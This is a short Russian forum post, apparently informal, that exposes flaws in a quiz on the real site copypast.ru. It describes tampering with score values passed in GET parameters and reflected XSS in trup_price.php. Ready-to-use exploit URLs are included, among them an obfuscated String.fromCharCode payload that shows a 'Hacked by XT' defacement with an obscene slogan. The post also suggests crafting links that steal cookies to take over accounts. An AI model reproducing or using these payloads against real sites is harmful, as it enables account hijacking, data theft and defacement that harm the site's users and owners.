нуну-)))
кстати кому интересно, тест немного по привычки посмотрел.
перменные из формы к форме передаються гет запросом..вообще они идут все через обработчик index.php
http://copypast.ru/trup/index.php?c=21&n01=5&n02=0...n16=5&n17=11&n18=5&n19=9&n20=0
перменная c обначает сколько вопросов, неа каком переходе передать полученные значения calc.php
переменные n* номера ответов, сообственно уже видны баллы за ответ.
так, что к примеру можно зайти
http://copypast.ru/trup/index.php?c=21&n01=99999999999
и получить максимальное возможное число разрешённое тут в десятичной системе, а если взять больше перейдём в hex=)))
вообщем значения перменных записываеться пока счётчик не дойдёт
до 21 тогда все значения принятые суммируються и передаються полученная сумма
http://copypast.ru/trup/trup_price.php?total=
в перменную тотал.
к примеру:
http://copypast.ru/trup/trup_price.php?total=99999...999999999999999999999999999999
=))
ну и кончно этот тест становиться дырявым местом под ХСС атаки на ресурс
http://copypast.ru/
пример:
http://copypast.ru/trup/trup_price.php?total=">
пассивная хсс перехват коденфициальныцх данных.
вообще весь тест такой любительский, прикольный, нулевой по безопасности через него можно пассивно взламывать аккуантов http://copypast.ru/
создав злонамеренную ссылку перехвата кукисов к примеру.
кто с ишака может глянуть пример псевдо-дефейса,
пройти по этой ссылки:
http://copypast.ru/trup/trup_price.php?total=src=javascript:document.write(String.fromCharCode(60,116,105,116,108,101,62,72,97,99,107,101,100,32,98,121,32,88,84,60,47,116,105,116,108,101,62,101,120,97,109,112,108,101,32,120,115,115,32,97,116,116,97,99,107,61,41,41,41,60,98,114,62,60,104,49,62,70,117,99,107,32,111,102,102,32,110,97,116,111,13,10))>